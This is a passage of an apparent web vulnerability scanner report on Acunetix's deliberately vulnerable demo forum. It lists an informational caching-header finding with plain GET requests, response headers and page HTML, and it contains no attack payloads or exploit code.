"mceCleanup":tinyMCE._setHTML(this.contentDocument,this.getBody().innerHTML);tinyMCE.setInnerHTML(this.getBody(),tinyMCE._cleanupHTML(this,this.contentDocument,this.settings,this.getBody(),this.visualAid));tinyMCE.handleVisualAid(this.getBody(),true,this.visualAid,this);tinyMCE._setEventsEnabled(this.getBody(),false);this.repaint();tinyMCE.triggerNodeChange();break;case "mceReplaceContent":this.getWin().focus();var selectedText="";if(tinyMCE.isMSIE){var rng=doc.selection.createRange();selectedText=rng.text;}else selectedText=this.getSel().toString();if(selectedText.length>0){value=tinyMCE.replaceVar(value,"selection",selectedText);tinyMCE.execCommand('mceInsertContent',false,value);}tinyMCE.triggerNodeChange();break;case "mceSetAttribute":if(typeof(value)=='object'){var targetElms=(typeof(value['targets'])=="undefined")?"p,img,span,div,td,h1,h2,h3,h4,h5,h6,pre,address":value['targets'];var targetNode=tinyMCE.getParentElement(this.getFocusElement(),targetElms);if(targetNode){targetNode.setAttribute(value['name'],value['value']);tinyMCE.triggerNodeChange();}}break;case "mceSetCSSClass":this.execCommand("SetStyleInfo",false,{command:"setattrib",name:"class",value:value});break;case "mceInsertRawHTML":var key='tiny_mce_marker';this.execCommand('mceBeginUndoLevel');this.execCommand('mceInsertContent',false,key);var scrollX=this.getDoc().body.scrollLeft+this.getDoc().documentElement.scrollLeft;var scrollY=this.getDoc().body.scrollTop+this.getDoc().documentElement.scrollTop;var html=this.getBody().innerHTML;if((pos=html.indexOf(key))!=-1)tinyMCE.setInnerHTML(this.getBody(),html.substring(0,pos)+value+html.substring(pos+key.length));this.contentWindow.scrollTo(scrollX,scrollY);this.execCommand('mceEndUndoLevel');break;case "mceInsertContent":var insertHTMLFailed=false;this.getWin().focus();if(tinyMCE.isGecko||tinyMCE.isOpera){try{this.getDoc().execCommand('inserthtml',false,value);}catch(ex){insertHTMLFailed=true;}if(!insertHTMLFailed){tinyMCE.triggerNodeChange();return;}}if(tinyMCE.isOpera&&insertHTMLFailed){this.getDoc().execCommand("insertimage",false,tinyMCE.uniqueURL);var ar=tinyMCE.getElementsByAttributeValue(this.getBody(),"img","src",tinyMCE.uniqueURL);ar[0].outerHTML=value;return;}if(!tinyMCE.isMSIE){var isHTML=value.indexOf('<')!=-1;var sel=this.getSel();var rng=this.getRng();if(isHTML){if(tinyMCE.isSafari){var tmpRng=this.getDoc().createRange();tmpRng.setStart(this.getBody(),0);tmpRng.setEnd(this.getBody(),0);value=tmpRng.createContextualFragment(value);}else value=rng.createContextualFragment(value);}else{var el=document.createElement("div");el.innerHTML=value;value=el.firstChild.nodeValue;value=doc.createTextNode(value);}if(tinyMCE.isSafari&&!isHTML){this.execCommand('InsertText',false,value.nodeValue);tinyMCE.triggerNodeChange();return true;}else if(tinyMCE.isSafari&&isHTML){rng.deleteContents();rng.insertNode(value);tinyMCE.triggerNodeChange();return true;}rng.deleteContents();if(rng.startContainer.nodeType==3){var node=rng.startContainer.splitText(rng.startOffset);node.parentNode.insertBefore(value,node);}else rng.insertNode(value);if(!isHTML){sel.selectAllChildren(doc.body);sel.removeAllRanges();var rng=doc.createRange();rng.selectNode(value);rng.collapse(false);sel.addRange(rng);}else rng.collapse(false);}else{var rng=doc.selection.createRange();if(rng.item)rng.item(0).outerHTML=value;else rng.pasteHTML(value);}tinyMCE.triggerNodeChange();break;case "mceStartTyping":if(tinyMCE.settings['custom_undo_redo']&&this.typingUndoIndex==-1){this.typingUndoIndex=this.undoIndex;this.execCommand('mceAddUndoLevel');}break;case "mceEndTyping":if(tinyMCE.settings['custom_undo_redo']&&this.typingUndoIndex!=-1){this.execCommand('mceAddUndoLevel');this.typingUndoIndex=-1;}break;case "mceBeginUndoLevel":this.undoRedo=false;break;case "mceEndUndoLevel":this.undoRedo=true;this.execCommand('mceAddUndoLevel');break;case "mceAddUndoLevel":if(tinyMCE.settings['custom_undo_redo']&&this.undoRedo){if(this.typingUndoIndex!=-1){this.undoIndex=this.typingUndoIndex;}var newHTML=tinyMCE.trim(this.getBody().innerHTML);if(newHTML!=this.undoLevels[this.undoIndex]){tinyMCE.executeCallback('onchange_callback','_onchange',0,this);var customUndoLevels=tinyMCE.settings['custom_undo_redo_levels'];if(customUndoLevels!=-1&&this.undoLevels.length>customUndoLevels){for(var i=0;i<this.undoLevels.length-1;i++){this.undoLevels[i]=this.undoLevels[i+1];}this.undoLevels.length--;this.undoIndex--;}this.undoIndex++;this.undoLevels[this.undoIndex]=newHTML;this.undoLevels.length=this.undoIndex+1;tinyMCE.triggerNodeChange(false);}}break;case "Undo":if(tinyMCE.settings['custom_undo_redo']){tinyMCE.execCommand("mceEndTyping");if(this.undoIndex>0){this.undoIndex--;tinyMCE.setInnerHTML(this.getBody(),this.undoLevels[this.undoIndex]);this.repaint();}tinyMCE.triggerNodeChange();}else this.getDoc().execCommand(command,user_interface,value);break;case "Redo":if(tinyMCE.settings['custom_undo_redo']){tinyMCE.execCommand("mceEndTyping");if(this.undoIndex<(this.undoLevels.length-1)){this.undoIndex++;tinyMCE.setInnerHTML(this.getBody(),this.undoLevels[this.undoIndex]);this.repaint();}tinyMCE.triggerNodeChange();}else this.getDoc().execCommand(command,user_interface,value);break;case "mceToggleVisualAid":this.visualAid=!this.visualAid;tinyMCE.handleVisualAid(this.getBody(),true,this.visualAid,this);tinyMCE.triggerNodeChange();break;case "Indent":this.getDoc().execCommand(command,user_interface,value);tinyMCE.triggerNodeChange();if(tinyMCE.isMSIE){var n=tinyMCE.getParentElement(this.getFocusElement(),"blockquote");do{if(n&&n.nodeName=="BLOCKQUOTE"){n.removeAttribute("dir");n.removeAttribute("style");}}while(n!=null&&(n=n.parentNode)!=null);}break;case "removeformat":var text=this.getSelectedText();if(tinyMCE.isOpera){this.getDoc().execCommand("RemoveFormat",false,null);return;}if(tinyMCE.isMSIE){try{var rng=doc.selection.createRange();rng.execCommand("RemoveFormat",false,null);}catch(e){}this.execCommand("SetStyleInfo",false,{command:"removeformat"});}else{this.getDoc().execCommand(command,user_interface,value);this.execCommand("SetStyleInfo",false,{command:"removeformat"});}if(text.length==0)this.execCommand("mceSetCSSClass",false,"");tinyMCE.triggerNodeChange();break;default:this.getDoc().execCommand(command,user_interface,value);if(tinyMCE.isGecko)window.setTimeout('tinyMCE.triggerNodeChange(false);',1);else tinyMCE.triggerNodeChange();}if(command!="mceAddUndoLevel"&&command!="Undo"&&command!="Redo"&&command!="mceStartTyping"&&command!="mceEndTyping")tinyMCE.execCommand("mceAddUndoLevel");};TinyMCEControl.prototype.queryCommandValue=function(command){return this.getDoc().queryCommandValue(command);};TinyMCEControl.prototype.queryCommandState=function(command){return this.getDoc().queryCommandState(command);};TinyMCEControl.prototype.onAdd=function(replace_element,form_element_name,target_document){var targetDoc=target_document?target_document:document;this.targetDoc=targetDoc;tinyMCE.themeURL=tinyMCE.baseURL+"/themes/"+this.settings['theme'];this.settings['themeurl']=tinyMCE.themeURL;if(!replace_element){alert("Error: Could not find the target element.");return false;}var templateFunction=tinyMCE._getThemeFunction('_getInsertLinkTemplate');if(eval("typeof("+templateFunction+")")!='undefined')this.insertLinkTemplate=eval(templateFunction+'(this.settings);');var templateFunction=tinyMCE._getThemeFunction('_getInsertImageTemplate');if(eval("typeof("+templateFunction+")")!='undefined')this.insertImageTemplate=eval(templateFunction+'(this.settings);');var templateFunction=tinyMCE._getThemeFunction('_getEditorTemplate');if(eval("typeof("+templateFunction+")")=='undefined'){alert("Error: Could not find the template function: "+templateFunction);return false;}var editorTemplate=eval(templateFunction+'(this.settings, this.editorId);');var deltaWidth=editorTemplate['delta_width']?editorTemplate['delta_width']:0;var deltaHeight=editorTemplate['delta_height']?editorTemplate['delta_height']:0;var html='<span id="'+this.editorId+'_parent">'+editorTemplate['html'];var templateFunction=tinyMCE._getThemeFunction('_handleNodeChange',true);if(eval("typeof("+templateFunction+")")!='undefined')this.settings['handleNodeChangeCallback']=templateFunction;html=tinyMCE.replaceVar(html,"editor_id",this.editorId);this.settings['default_document']=tinyMCE.baseURL+"/blank.htm";this.settings['old_width']=this.settings['width'];this.settings['old_height']=this.settings['height'];if(this.settings['width']==-1)this.settings['width']=replace_element.offsetWidth;if(this.settings['height']==-1)this.settings['height']=replace_element.offsetHeight;if(this.settings['width']==0)this.settings['width']=replace_element.style.width;if(this.settings['height']==0)this.settings['height']=replace_element.style.height;if(this.settings['width']==0)this.settings['width']=320;if(this.settings['height']==0)this.settings['height']=240;this.settings['area_width']=parseInt(this.settings['width']);this.settings['area_height']=parseInt(this.settings['height']);this.settings['area_width']+=deltaWidth;this.settings['area_height']+=deltaHeight;if((""+this.settings['width']).indexOf('%')!=-1)this.settings['area_width']="100%";if((""+this.settings['height']).indexOf('%')!=-1)this.settings['area_height']="100%";if((""+replace_element.style.width).indexOf('%')!=-1){this.settings['width']=replace_element.style.width;this.settings['area_width']="100%";}if((""+replace_element.style.height).indexOf('%')!=-1){this.settings['height']=replace_element.style.height;this.settings['area_height']="100%";}html=tinyMCE.applyTemplate(html);this.settings['width']=this.settings['old_width'];this.settings['height']=this.settings['old_height'];this.visualAid=this.settings['visual'];this.formTargetElementId=form_element_name;if(replace_element.nodeName=="TEXTAREA"||replace_element.nodeName=="INPUT")this.startContent=replace_element.value;else this.startContent=replace_element.innerHTML;if(replace_element.nodeName.toLowerCase()!="textarea"){this.oldTargetElement=replace_element.cloneNode(true);if(tinyMCE.settings['debug'])html+='<textarea wrap="off" id="'+form_element_name+'" name="'+form_element_name+'" cols="100" rows="15"></textarea>';else html+='<input type="hidden" type="text" id="'+form_element_name+'" name="'+form_element_name+'" />';html+='</span>';if(!tinyMCE.isMSIE){var rng=replace_element.ownerDocument.createRange();rng.setStartBefore(replace_element);var fragment=rng.createContextualFragment(html);replace_element.parentNode.replaceChild(fragment,replace_element);}else replace_element.outerHTML=html;}else{html+='</span>';this.oldTargetElement=replace_element;if(!tinyMCE.settings['debug'])this.oldTargetElement.style.display="none";if(!tinyMCE.isMSIE){var rng=replace_element.ownerDocument.createRange();rng.setStartBefore(replace_element);var fragment=rng.createContextualFragment(html);replace_element.parentNode.insertBefore(fragment,replace_element);}else replace_element.insertAdjacentHTML("beforeBegin",html);}var dynamicIFrame=false;var tElm=targetDoc.getElementById(this.editorId);if(!tinyMCE.isMSIE){if(tElm&&tElm.nodeName.toLowerCase()=="span"){tElm=tinyMCE._createIFrame(tElm);dynamicIFrame=true;}this.targetElement=tElm;this.iframeElement=tElm;this.contentDocument=tElm.contentDocument;this.contentWindow=tElm.contentWindow;}else{if(tElm&&tElm.nodeName.toLowerCase()=="span")tElm=tinyMCE._createIFrame(tElm);else tElm=targetDoc.frames[this.editorId];this.targetElement=tElm;this.iframeElement=targetDoc.getElementById(this.editorId);if(tinyMCE.isOpera){this.contentDocument=this.iframeElement.contentDocument;this.contentWindow=this.iframeElement.contentWindow;dynamicIFrame=true;}else{this.contentDocument=tElm.window.document;this.contentWindow=tElm.window;}this.getDoc().designMode="on";}var doc=this.contentDocument;if(dynamicIFrame){var html=tinyMCE.getParam('doctype')+'<html><head xmlns="http://www.w3.org/1999/xhtml"><base href="'+tinyMCE.settings['base_href']+'" /><title>blank_page</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"></head><body class="mceContentBody"></body></html>';try{this.getDoc().designMode="on";doc.open();doc.write(html);doc.close();}catch(e){this.getDoc().location.href=tinyMCE.baseURL+"/blank.htm";}}if(tinyMCE.isMSIE)window.setTimeout("TinyMCE.prototype.addEventHandlers('"+this.editorId+"');",1);tinyMCE.setupContent(this.editorId,true);return true;};TinyMCEControl.prototype.getFocusElement=function(){if(tinyMCE.isMSIE&&!tinyMCE.isOpera){var doc=this.getDoc();var rng=doc.selection.createRange();var elm=rng.item?rng.item(0):rng.parentElement();}else{var sel=this.getSel();var rng=this.getRng();var elm=rng.commonAncestorContainer;if(!rng.collapsed){if(rng.startContainer==rng.endContainer){if(rng.startOffset-rng.endOffset<2){if(rng.startContainer.hasChildNodes())elm=rng.startContainer.childNodes[rng.startOffset];}}}elm=tinyMCE.getParentElement(elm);}return elm;};var tinyMCE=new TinyMCE();var tinyMCELang=new Array(); |
| Instances | 1 |
| Solution |
This is an informational alert and so no changes are required.
|
| Reference | |
| Tags | |
| CWE Id | |
| WASC Id | |
| Plugin Id | 10109 |
|
Informational |
Non-Storable Content |
|---|---|
| Description |
The response contents are not storable by caching components such as proxy servers. If the response does not contain sensitive, personal or user-specific information, it may benefit from being stored and cached, to improve performance.
|
| URL | http://testasp.vulnweb.com |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 205 bytes. |
GET http://testasp.vulnweb.com HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 244 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 Set-Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA; path=/ X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:21 GMT Content-Length: 3559 |
| Response Body - size: 3,559 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum forums</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FDefault%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FDefault%2Easp%3F" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <table width="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td class="tableheader">Forum</td> <td class="tableheader">Threads</td> <td class="tableheader">Posts</td> <td class="tableheader">Last Post</td> </tr> <tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=0'>Acunetix Web Vulnerability Scanner</a></div><div class='forumdescription'>Talk about Acunetix Web Vulnerablity Scanner</div></td><td>82</td><td>82</td><td>3/14/2022 7:22:30 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='forumtitle'><a href='showforum.asp?id=1'>Weather</a></div><div class='forumdescription'>What weather is in your town right now</div></td><td>1</td><td>1</td><td>3/14/2022 5:30:18 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=2'>Miscellaneous</a></div><div class='forumdescription'>Anything crossing your mind can be posted here</div></td><td>6</td><td>6</td><td>3/13/2022 3:34:42 PM</td></tr> </table><!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/ |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 206 bytes. |
GET http://testasp.vulnweb.com/ HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 244 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 Set-Cookie: ASPSESSIONIDCQRDQBRC=NJGCKBOCAAGEAOFIEAFFCFAM; path=/ X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:20 GMT Content-Length: 3559 |
| Response Body - size: 3,559 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum forums</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FDefault%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FDefault%2Easp%3F" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <table width="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td class="tableheader">Forum</td> <td class="tableheader">Threads</td> <td class="tableheader">Posts</td> <td class="tableheader">Last Post</td> </tr> <tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=0'>Acunetix Web Vulnerability Scanner</a></div><div class='forumdescription'>Talk about Acunetix Web Vulnerablity Scanner</div></td><td>82</td><td>82</td><td>3/14/2022 7:22:30 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='forumtitle'><a href='showforum.asp?id=1'>Weather</a></div><div class='forumdescription'>What weather is in your town right now</div></td><td>1</td><td>1</td><td>3/14/2022 5:30:18 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=2'>Miscellaneous</a></div><div class='forumdescription'>Anything crossing your mind can be posted here</div></td><td>6</td><td>6</td><td>3/13/2022 3:34:42 PM</td></tr> </table><!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Default.asp |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 309 bytes. |
GET http://testasp.vulnweb.com/Default.asp HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:22 GMT Content-Length: 3559 |
| Response Body - size: 3,559 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum forums</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FDefault%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FDefault%2Easp%3F" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <table width="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td class="tableheader">Forum</td> <td class="tableheader">Threads</td> <td class="tableheader">Posts</td> <td class="tableheader">Last Post</td> </tr> <tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=0'>Acunetix Web Vulnerability Scanner</a></div><div class='forumdescription'>Talk about Acunetix Web Vulnerablity Scanner</div></td><td>82</td><td>82</td><td>3/14/2022 7:22:30 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='forumtitle'><a href='showforum.asp?id=1'>Weather</a></div><div class='forumdescription'>What weather is in your town right now</div></td><td>1</td><td>1</td><td>3/14/2022 5:30:18 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=2'>Miscellaneous</a></div><div class='forumdescription'>Anything crossing your mind can be posted here</div></td><td>6</td><td>6</td><td>3/13/2022 3:34:42 PM</td></tr> </table><!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2FDefault%2Easp%3F |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 334 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2FDefault%2Easp%3F HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:22 GMT Content-Length: 3198 |
| Response Body - size: 3,198 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FDefault%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FDefault%2Easp%3F" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3F |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 344 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3F HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/Search.asp Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:24 GMT Content-Length: 3196 |
| Response Body - size: 3,196 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FSearch%2Easp%3F" class="menu">login</a> - <a 